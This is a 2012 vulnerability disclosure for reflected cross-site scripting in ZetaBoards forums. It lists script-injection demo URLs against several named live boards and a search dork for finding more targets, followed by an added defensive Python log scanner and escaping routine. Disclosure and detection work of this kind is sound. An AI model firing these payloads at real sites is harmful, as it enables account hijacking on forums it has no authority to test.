# Exploit Title: ZetaBoards Cross Site Scripting
# Date: 6.03.2012
# Author: Sony
# Software Link: http://www.zetaboards.com/
# Google Dorks: intext:Hosted for free by ZetaBoards
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2012/03/zetaboards-cross-site-scripting.html

..................................................................

Well, we have multiple cross-site scripting vulnerabilities in ZetaBoards.

Who uses ZetaBoards?

http://www.zetaboards.com/directory/

The ZetaBoards Forum Directory contains 55,882 boards. (c)

Demo:

http://if.invisionfree.com/index/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://4.bp.blogspot.com/-hNc74z9U8Ak/T1ZYo20Qi5I/AAAAAAAAAsU/FvA7uSkQ1E4/s1600/forum2.JPG

http://nintendo-forums.com/calendar/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://2.bp.blogspot.com/-ny-FA_k5lIQ/T1ZY0NiZjOI/AAAAAAAAAsg/Wu1dk3V5QFg/s1600/forum1.JPG

http://support.zetaboards.com/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://2.bp.blogspot.com/--2qVcuCeRy0/T1ZZAgL3hPI/AAAAAAAAAss/G6N1fFs29OI/s1600/forum3.JPG

http://support.zetaboards.com/login/lostpw/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://4.bp.blogspot.com/-SOIbojMMsyE/T1ZZOtjJCII/AAAAAAAAAs4/3D_Mpe3Pm-Q/s1600/forum4.JPG

http://sonicblast.org/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E
http://2.bp.blogspot.com/-zA3ibj72U9E/T1ZZbE7F5xI/AAAAAAAAAtE/w74HmHtYaU8/s1600/forum5.JPG

Video: http://www.youtube.com/watch?v=ZGvwY9z3ZYA
..................................................................

InSecurity.Ro
Because we care, we're security aware!
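
Added example, not part of the original advisory: in every demo URL the markup is percent-encoded and placed in the URL path after the page name (index, calendar, members, login/lostpw), not in the query string, so the sketch below scans access-log request paths for decoded markup characters and shows the output encoding that neutralises a reflected path. The log lines are constructed, the function names are hypothetical, and reflection into HTML (attribute or text) is an assumption based on the payload shape.

```python
import html
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = '''\
198.51.100.4 - - [06/Mar/2012:10:01:12 +0000] "GET /members/ HTTP/1.1" 200 8120
203.0.113.7 - - [06/Mar/2012:10:01:15 +0000] "GET /members/%22%22%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 8344
203.0.113.7 - - [06/Mar/2012:10:01:19 +0000] "GET /calendar/%2522%253E%253Cscript%253E HTTP/1.1" 200 7990
198.51.100.9 - - [06/Mar/2012:10:02:03 +0000] "GET /index/?q=a%3Cb HTTP/1.1" 200 9001
'''

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"]')  # enough to leave an attribute value or open a tag

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_path_markup(log_text):
    """Return (client, decoded_path) for requests whose path carries markup.

    Only the path is inspected; the query string is left to other rules.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        path = decode_fully(target.split("?", 1)[0])
        if MARKUP.search(path):
            hits.append((client, path))
    return hits

def escape_for_html(value):
    """Encode a request-derived string before writing it into HTML."""
    return html.escape(value, quote=True)

if __name__ == "__main__":
    for client, path in flag_path_markup(SAMPLE_LOG):
        print(client, path, "->", escape_for_html(path))
```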